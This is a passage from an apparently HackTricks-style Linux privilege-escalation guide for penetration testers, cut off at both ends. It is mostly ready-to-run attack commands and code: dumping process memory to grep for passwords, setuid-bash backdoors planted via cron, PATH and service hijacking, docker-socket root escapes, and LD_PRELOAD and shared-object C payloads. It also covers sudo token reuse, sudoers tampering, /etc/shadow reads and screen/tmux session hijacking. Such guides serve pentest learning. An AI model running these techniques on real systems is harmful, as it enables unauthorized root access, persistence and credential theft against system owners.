skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" + done ) + cat $1*.bin > $1.dump + rm $1*.bin +) +``` + +#### /dev/mem + +`/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernels virtual address space can be accessed using /dev/kmem. +Typically, `/dev/mem` is only readable by **root** and **kmem** group. + +```text +strings /dev/mem -n10 | grep -i PASS +``` + +#### Tools + +To dump a process memory you could use: + +* [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) \(root\) - _You can manually remove root requirements and dump process owned by you_ +* Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) \(root is required\) + +### Credentials from Process Memory + +#### Manual example + +If you find that the authenticator process is running: + +```bash +ps -ef | grep "authenticator" +root 2027 2025 0 11:46 ? 00:00:00 authenticator +``` + +You can dump the process \(see before sections to find different ways to dump the memory of a process\) and search for credentials inside the memory: + +```bash +./dump-memory.sh 2027 +strings *.dump | grep -i password +``` + +#### mimipenguin + +The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly. + +| Feature | Process Name | +| :--- | :--- | +| GDM password \(Kali Desktop, Debian Desktop\) | gdm-password | +| Gnome Keyring \(Ubuntu Desktop, ArchLinux Desktop\) | gnome-keyring-daemon | +| LightDM \(Ubuntu Desktop\) | lightdm | +| VSFTPd \(Active FTP Connections\) | vsftpd | +| Apache2 \(Active HTTP Basic Auth Sessions\) | apache2 | +| OpenSSH \(Active SSH Sessions - Sudo Usage\) | sshd: | + +## Scheduled/Cron jobs + +Check if any scheduled job is vulnerable. Maybe you can take advantage of a script being executed by root \(wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?\). + +```bash +crontab -l +ls -al /etc/cron* /etc/at* +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#" +``` + +### Cron path + +For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_ + +\(_Note how the user "user" has writing privileges over /home/user_\) + +If inside this crontab the root user tries to execute some command or script without setting the path. For example: _\* \* \* \* root overwrite.sh_ +Then, you can get a root shell by using: + +```bash +echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh +#Wait cron job to be executed +/tmp/bash -p #The effective uid and gid to be set to the real uid and gid +``` + +### Cron using a script with a wildcard \(Wildcard Injection\) + +If a script being executed by root has a “**\***” inside a command, you could exploit this to make unexpected things \(like privesc\). Example: + +```bash +rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script +``` + +**If the wildcard is preceded of a path like** _**/some/path/\***_ **, it's not vulnerable \(even** _**./\***_ **is not\).** + +Read the following page for more wildcard exploitation tricks: + +{% page-ref page="wildcards-spare-tricks.md" %} + +### Cron script overwriting and symlink + +If you **can modify a cron script** executed by root, you can get a shell very easily: + +```bash +echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > +#Wait until it is executed +/tmp/bash -p +``` + +If the script executed by root uses a **directory where you have full access**, maybe it could be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you + +```bash +ln -d -s +``` + +### Frequent cron jobs + +You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges. + +For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and deleting the commands that have beeing executed all the time, you can do: + +```bash +for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp; +``` + +**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) \(this will monitor and list every process that start\). + +### Invisible cron jobs + +It's possible to create a cronjob **putting a carriage return after a comment** \(without new line character\), and the cron job will work. Example \(note the carriege return char\): + +```bash +#This is a comment inside a cron config file\r* * * * * echo "Surprise!" +``` + +## Services + +### Writable _.service_ files + +Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** \(maybe you will need to wait until the machine is rebooted\). +For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`** + +### Writable service binaries + +Keep in mid that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed. + +### systemd PATH - Relative Paths + +You can see the PATH used by **systemd** with: + +```bash +systemctl show-environment +``` + +If you find that you can **write** in any of the folders of the path you may be able to **escalate privileges**. You need to search for **relative paths being used on service configurations** files like: + +```bash +ExecStart=faraday-server +ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' +ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" +``` + +Then, create a **executable** with the **same name as the relative path binary** inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action \(**Start**, **Stop**, **Reload**\), your **backdoor will be executed** \(unprivileged users usually cannot start/stop services but check if you can using `sudo -l`\). + +**Learn more about services with `man systemd.service`.** + +## **Timers** + +**Timers** are systemd unit files whose name ends in . **timer** that control . service files or events. **Timers** can be used as an alternative to cron. **Timers** have built-in support for calendar time events, monotonic time events, and can be run asynchronously. + +You can enumerate all the timers doing: + +```bash +systemctl list-timers --all +``` + +### Writable timers + +If you can modify a timer you can make it execute some existent systemd.unit \(like a `.service` or a `.target`\) + +```bash +Unit=backdoor.service +``` + +In the documentation you can read what the Unit is: + +> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. \(See above.\) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. + +Therefore, in order to abuse this permissions you would need to: + +* Find some systemd unit \(like a `.service`\) that is **executing a writable binary** +* Find some systemd unit that is **executing a relative path** and you have **writable privileges** over the **systemd PATH** \(to impersonate that executable\) + +**Learn more about timers with `man systemd.timer`.** + +### **Enabling Timer** + +In order to enable a timer you need root privileges and to execute: + +```bash +sudo systemctl enable backu2.timer +Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. +``` + +Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` + +## Sockets + +In brief, a Unix Socket \(technically, the correct name is Unix domain socket, **UDS**\) allows **communication between two different processes** on either the same machine or different machines in client-server application frameworks. To be more precise, it’s a way of communicating among computers using a standard Unix descriptors file. \(From [here](https://www.linux.com/news/what-socket/)\). + +Sockets can be configured using `.socket` files. + +**Learn more about sockets with `man systemd.socket`.** Inside this file some several interesting parameters can be configured: + +* `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: This options are different but as summary as used to **indicate where is going to listen** the socket \(the path of the AF\_UNIX socket file, the IPv4/6 and/or port number to listen...\). +* `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`. +* `ExecStartPre`, `ExecStartPost`: Takes one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, then followed by arguments for the process. +* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively. +* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket \(with the suffix replaced\). In most cases, it should not be necessary to use this option. + +### Writable .socket files + +If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.** +_Note that the system must be using that socket file configuration or the backdoor won't be executed_ + +### Writable sockets + +If you **identify any writable socket** \(_now where are talking about Unix Sockets, not about the config `.socket` files_\), then, **you can communicate** with that socket and maybe exploit a vulnerability. + +### Enumerate Unix Sockets + +```bash +netstat -a -p --unix +``` + +### Raw connection + +```bash +#apt-get install netcat-openbsd +nc -U /tmp/socket #Connect to UNIX-domain stream socket +nc -uU /tmp/socket #Connect to UNIX-domain datagram socket + +#apt-get install socat +socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type +``` + +**Exploitation example:** + +{% page-ref page="socket-command-injection.md" %} + +### HTTP sockets + +Note that there may be some **sockets listening for HTTP** requests \(_I'm not talking about .socket files but about the files acting as unix sockets_\). You can check this with: + +```bash +curl --max-time 2 --unix-socket /pat/to/socket/files http:/index +``` + +If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**. + +### Writable Docker Socket + +The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group. +If for some reason **you have write permissions** over that socket you can escalate privileges. +The following commands can be used to escalate privileges: + +```bash +docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + +#### Use docker web API from socket without docker package + +If you have access to **docker socket** but you can't use the docker binary \(maybe it isn't even installed\), you can use directly the web API with `curl`. + +The following commands are a example to **create a docker container that mount the root** of the host system and use `socat` to execute commands into the new docker. + +```bash +# List docker images +curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json +##[{"Containers":-1,"Created":1588544489,"Id":"sha256:",...}] +# Send JSON to docker API to create the container +curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create +##{"Id":"","Warnings":[]} +curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start +``` + +The last step is to use `socat` to initiate a connection to the container, sending an attach request + +```bash +socat - UNIX-CONNECT:/var/run/docker.sock +POST /containers//attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 +Host: +Connection: Upgrade +Upgrade: tcp + +#HTTP/1.1 101 UPGRADED +#Content-Type: application/vnd.docker.raw-stream +#Connection: Upgrade +#Upgrade: tcp +``` + +Now, you can execute commands on the container from this `socat` connection. + +#### Others + +Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../pentesting/2375-pentesting-docker.md#compromising). + +### Containerd \(ctr\) privilege escalation + +If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: + +{% page-ref page="containerd-ctr-privilege-escalation.md" %} + +### **RunC** privilege escalation + +If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: + +{% page-ref page="runc-privilege-escalation.md" %} + +## **D-Bus** + +D-BUS is an **inter-process communication \(IPC\) system**, providing a simple yet powerful mechanism **allowing applications to talk to one another**, communicate information and request services. D-BUS was designed from scratch to fulfil the needs of a modern Linux system. + +D-BUS, as a full-featured IPC and object system, has several intended uses. First, D-BUS can perform basic application IPC, allowing one process to shuttle data to another—think **UNIX domain sockets on steroids**. Second, D-BUS can facilitate sending events, or signals, through the system, allowing different components in the system to communicate and ultimately to integrate better. For example, a Bluetooth dæmon can send an incoming call signal that your music player can intercept, muting the volume until the call ends. Finally, D-BUS implements a remote object system, letting one application request services and invoke methods from a different object—think CORBA without the complications. _\*\*_\(From [here](https://www.linuxjournal.com/article/7744)\). + +D-Bus uses an **allow/deny model**, where each message \(method call, signal emission, etc.\) can be **allowed or denied** according to the sum of all policy rules which match it. Each or rule in the policy should have the `own`, `send_destination` or `receive_sender` attribute set. + +Part of the policy of `/etc/dbus-1/system.d/wpa_supplicant.conf`: + +```markup + + + + + + +``` + +Therefore, if a policy is allowing your user in anyway to **interact with the bus**, you could be able to exploit it to escalate privileges \(maybe just listing for some passwords?\). + +Note that a **policy** that **doesn't specify** any user or group affects everyone \(``\). +Policies to the context "default" affects everyone not affected by other policies \(`/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null) + +#Files used by network services +lsof -i +``` + +### Open ports + +Always check network services running on the machine that you wasn't able to interact with before accessing to it: + +```bash +(netstat -punta || ss --ntpu) +(netstat -punta || ss --ntpu) | grep "127.0" +``` + +### Sniffing + +Check if you can sniff traffic. If you can, you could be able to grab some credentials. + +```text +timeout 1 tcpdump +``` + +## Users + +### Generic Enumeration + +Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:** + +```bash +#Info about me +id || (whoami && groups) 2>/dev/null +#List all users +cat /etc/passwd | cut -d: -f1 +#List users with console +cat /etc/passwd | grep "sh$" +#List superusers +awk -F: '($3 == "0") {print}' /etc/passwd +#Currently logged users +w +#Login history +last | tail +#Last log of each user +lastlog + +#List all users and their groups +for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort +#Current user PGP keys +gpg --list-keys 2>/dev/null +``` + +### Big UID + +Some Linux versions were affected by a bug that allow users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674). +**Exploit it** using: **`systemd-run -t /bin/bash`** + +### Groups + +Check if you are a **member of some group** that could grant you root privileges: + +{% page-ref page="interesting-groups-linux-pe/" %} + +### Clipboard + +Check if anything interesting is located inside the clipboard \(if possible\) + +```bash +if [ `which xclip 2>/dev/null` ]; then + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` + echo "Highlighted text: "`xclip -o 2>/dev/null` + elif [ `which xsel 2>/dev/null` ]; then + echo "Clipboard: "`xsel -ob 2>/dev/null` + echo "Highlighted text: "`xsel -o 2>/dev/null` + else echo "Not found xsel and xclip" + fi +``` + +### Password Policy + +```bash +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs +``` + +### Known passwords + +If you **know any password** of the environment **try to login as each user** using the password. + +### Su Brute + +If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce). +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users. + +## Writable PATH abuses + +### $PATH + +If you find that you can **write inside some folder of the $PATH** you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user \(root ideally\) and that is **not loaded from a folder that is located previous** to your writable folder in $PATH. + +## SUDO and SUID + +You could be allowed to execute some command using sudo or they could have the suid bit. Check it using: + +```bash +sudo -l #Check commands you can execute with sudo +find / -perm -4000 2>/dev/null #Find all SUID binaries +``` + +Some **unexpected commands allows you to read and/or write files or even execute command.** For example: + +```bash +sudo awk 'BEGIN {system("/bin/sh")}' +sudo find /etc -exec sh -i \; +sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh +sudo tar c a.tar -I ./runme.sh a +ftp>!/bin/sh +less>! +``` + +### NOPASSWD + +Sudo configuration might allow a user to execute some command with another user privileges without knowing the password. + +```text +$ sudo -l +User demo may run the following commands on crashlab: + (root) NOPASSWD: /usr/bin/vim +``` + +In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. + +```text +sudo vim -c '!sh' +``` + +### SETENV + +This directive allows the user to **set an environment variable** while executing something: + +```bash +$ sudo -l +User waldo may run the following commands on admirer: + (ALL) SETENV: /opt/scripts/admin_tasks.sh +``` + +This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** in order to load an arbitrary python library while executing the script as root: + +```bash +sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh +``` + +### Sudo execution bypassing paths + +**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_ + +```bash +sudo less /var/logs/anything +less>:e /etc/shadow #Jump to read other files using privileged less +``` + +```bash +ln /etc/shadow /var/log/new +sudo less /var/log/new #Use symlinks to read any file +``` + +If a **wilcard** is used \(\*\), it is even easier: + +```bash +sudo less /var/log/../../etc/shadow #Read shadow +sudo less /var/log/something /etc/shadow #Red 2 files +``` + +**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) + +### Sudo command/SUID binary without command path + +If the **sudo permission** is given to a single command **without specifying the path**: _hacker10 ALL= \(root\) less_ you can exploit it by changing the PATH variable + +```bash +export PATH=/tmp:$PATH +#Put your backdoor in /tmp and name it "less" +sudo less +``` + +This technique can also be used if a **suid** binary **executes another command without specifying the path to it \(always check with** _**strings**_ **the content of a weird SUID binary\)**. + +[Payload examples to execute.](payloads-to-execute.md) + +### SUID binary with command path + +If the **suid** binary **executes another command specifying the path**, then, you can try to **export a function** named as the command that the suid file is calling. + +For example, if a suid binary calls _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it: + +```bash +function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } +export -f /usr/sbin/service +``` + +Then, when you call the suid binary, this function will be executed + +### LD\_PRELOAD + +**LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library \(libc.so\) This is called preloading a library. + +To avoid this mechanism being used as an attack vector for _suid/sgid_ executable binaries, the loader ignores _LD\_PRELOAD_ if _ruid != euid_. For such binaries, only libraries in standard paths that are also _suid/sgid_ will be preloaded. + +If you find inside the output of **`sudo -l`** the sentence: _**env\_keep+=LD\_PRELOAD**_ and you can call some command with sudo, you can escalate privileges. + +```text +Defaults env_keep += LD_PRELOAD +``` + +Save as **/tmp/pe.c** + +```c +#include +#include +#include + +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/bash"); +} +``` + +Then **compile it** using: + +```bash +cd /tmp +gcc -fPIC -shared -o pe.so pe.c -nostartfiles +``` + +Finally, **escalate privileges** running + +```bash +sudo LD_PRELOAD=pe.so #Use any command you can run with sudo +``` + +### SUID Binary – so injection + +If you find some weird binary with **SUID** permissions, you could check if all the **.so** files are **loaded correctly**. In order to do so you can execute: + +```bash +strace 2>&1 | grep -i -E "open|access|no such file" +``` + +For example, if you find something like: _pen\(“/home/user/.config/libcalc.so”, O\_RDONLY\) = -1 ENOENT \(No such file or directory\)_ you can exploit it. + +Create the file _/home/user/.config/libcalc.c_ with the code: + +```c +#include +#include + +static void inject() __attribute__((constructor)); + +void inject(){ + system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); +} +``` + +Compile it using: + +```bash +gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c +``` + +And execute the binary. + +### GTFOBins + +[**GTFOBins**](https://gtfobins.github.io/) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. + +The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. + +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '! /bin/sh' +> strace -o /dev/null /bin/sh +> sudo awk 'BEGIN {system\("/bin/sh"\)}' + +{% embed url="https://gtfobins.github.io/" caption="" %} + +### FallOfSudo + +If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/Critical-Start/FallofSudo) to check if it finds how to exploit any sudo rule. + +### Reusing Sudo Tokens + +In the scenario where **you have a shell as a user with sudo privileges** but you don't know the password of the user, you can **wait him to execute some command using `sudo`**. Then, you can **access the token of the session where sudo was used and use it to execute anything as sudo** \(privilege escalation\). + +Requirements to escalate privileges: + +* You already have a shell as user "_sampleuser_" +* "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** \(by default that's the duration of the sudo token that allows to use `sudo` without introducing any password\) +* `cat /proc/sys/kernel/yama/ptrace_scope` is 0 +* `gdb` is accessible \(you can be able to upload it\) + +\(You can temporarily enable `ptrace_scope` with `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` or permanently modifying `/etc/sysctl.d/10-ptrace.conf` and setting `kernel.yama.ptrace_scope = 0`\) + +If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo\_inject**](https://github.com/nongiach/sudo_inject) + +* The **first exploit** \(`exploit.sh`\) will create the binary `activate_sudo_token` in _/tmp_. You can use it to **activate the sudo token in your session** \(you won't get automatically a root shell, do `sudo su`\): + +```bash +bash exploit.sh +/tmp/activate_sudo_token +sudo su +``` + +* The **second exploit** \(`exploit_v2.sh`\) will create a sh shell in _/tmp_ **owned by root with setuid** + +```bash +bash exploit_v2.sh +/tmp/sh -p +``` + +* The **third exploit** \(`exploit_v3.sh`\) will **create a sudoers file** that makes **sudo tokens eternal and allows all users to use sudo** + +```bash +bash exploit_v3.sh +sudo su +``` + +### /var/run/sudo/ts/<Username> + +If you have **write permissions** in the folder or on any of the created files inside the folder you can use the binary [**write\_sudo\_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) to **create a sudo token for a user and PID**. +For example if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password doing: + +```bash +./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser +``` + +### /etc/sudoers, /etc/sudoers.d + +The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. This files **by default can only be read by user root and group root**. +**If** you can **read** this file you could be able to **obtain some interesting information**, and if you can **write** any file you will be able to **escalate privileges**. + +```bash +ls -l /etc/sudoers /etc/sudoers.d/ +ls -ld /etc/sudoers.d/ +``` + +If you can write you can abuse this permissions + +```bash +echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers +echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README +``` + +Other way to abuse these permissions: + +```bash +# makes it so every terminal can sudo +echo "Defaults !tty_tickets" > /etc/sudoers.d/win +# makes it so sudo never times out +echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win +``` + +### DOAS + +There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` + +```text +permit nopass demo as root cmd vim +``` + +### Sudo Hijacking + +If you know that a **user usually connects to a machine and uses `sudo`** to escalate privileges and you got a shell within that user context, you can **create a new sudo executable** that will execute your code as root and then the users command. Then, **modify the $PATH** of the user context \(for example adding the new path in .bash\_profile\) so we the user executed sudo, your sudo executable is executed. + +Note that if the user uses a different shell \(not bash\) you will need to modify other files to add the new path. For example[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) + +## Shared Library + +### ld.so + +The file `/etc/ld.so.conf` indicates **where are loaded the configurations files from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf` + +That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **points to another folders** where **libraries** are going to be **searched** for. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **This means that the system will search for libraries inside `/usr/local/lib`**. + +If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder indicated inside any config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges. +Take a look about **how to exploit this misconfiguration** in the following page: + +{% page-ref page="ld.so.conf-example.md" %} + +### RPATH + +```text +level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" + 0x00000001 (NEEDED) Shared library: [libc.so.6] + 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x0068c000) + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x005bb000) +``` + +By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. + +```text +level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x005b0000) + libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x00737000) +``` + +Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` + +```c +#include +#define SHELL "/bin/sh" + +int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) +{ + char *file = SHELL; + char *argv[] = {SHELL,0}; + setresuid(geteuid(),geteuid(), geteuid()); + execve(file,argv,0); +} +``` + +## Capabilities + +Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. +Read the following page to **learn more about capabilities and how to abuse them**: + +{% page-ref page="linux-capabilities.md" %} + +## Directory permissions + +In a directory the **bit for execute** implies that the user affected can "**cd**" into the folder. +The **read** bit implies the user can **list** the **files**, and the **write** bit implies the user can **delete** and **create** new **files**. + +## ACLs + +ACLs are a second level of discretionary permissions, that **may override the standard ugo/rwx** ones. When used correctly they can grant you a **better granularity in setting access to a file or a directory**, for example by giving or denying access to a specific user that is neither the file owner, nor in the group owner \(from [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux)\). +**Give** user "kali" read and write permissions over a file: + +```bash +setfacl -m u:kali:rw file.txt +``` + +**Get** files with specific ACLs from the system: + +```bash +getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null +``` + +## Open shell sessions + +In **old versions** you may **hijack** some **shell** session of a different user \(**root**\). +In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside of the session**. + +### screen sessions hijacking + +**List screen sessions** + +```bash +screen -ls +``` + +![](../../.gitbook/assets/image%20%28327%29.png) + +**Attach to a session** + +```bash +screen -dr #The -d is to detacche whoever is attached to it +screen -dr 3350.foo #In the example of the image +``` + +### tmux sessions hijacking + +Apparently this was a problem with **old tmux versions**. I wasn't able to hijack a tmux \(v2.1\) session created by root from a non-privileged user. + +**List tmux sessions** + +```bash +tmux ls +ps aux | grep tmux #Search for tmux consoles not using default folder for sockets +tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess +``` + +![](../../.gitbook/assets/image%20%28126%29.png) + +**Attach to a session** + +```bash +tmux attach -t myname #If you write something in this session it will appears in the other opened one +tmux attach -d -t myname #First detach the sessinos from the other console and then access it yourself +tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket +``` + +Check **valentine box from HTB** for an example. + +## SSH + +### Debian OpenSSL Predictable PRNG - CVE-2008-0166 + +All SSL and SSH keys generated on Debian-based systems \(Ubuntu, Kubuntu, etc\) between September 2006 and May 13th, 2008 may be affected by this bug. +This bug caused that when creating in those OS a new ssh key **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) + +### SSH Interesting configuration values + +* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`. +* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`. +* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`. + +#### PermitRootLogin + +Specifies whether root can log in using ssh, default is `no`. Possible values: + +* `yes` : root can login using password and private key +* `without-password` or `prohibit-password`: root can only login with private key +* `forced-commands-only`: Root can login only using privatekey cand if the commands options is specified +* `no` : no + +#### AuthorizedKeysFile + +Specifies files that contains the public keys that can be used for user authentication. I can contains tokens like `%h` , that will be replaced by the home directory. **You can indicate absolute paths** \(starting in `/`\) or **relative paths from the users home**. For example: + +```bash +AuthorizedKeysFile .ssh/authorized_keys access +``` + +That configuration will indicate that if you try to login with the **private** key **\*\*of the user "**testusername\*\*" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` + +#### ForwardAgent/AllowAgentForwarding + +SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** \(without passphrases!\) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**. + +You need to set this option in `$HOME/.ssh.config` like this: + +```text +Host example.com + ForwardAgent yes +``` + +Notice that if `Host` is `*` every time the user jumps to a different machine that host will be able to access the keys \(which is a security issue\). + +The file 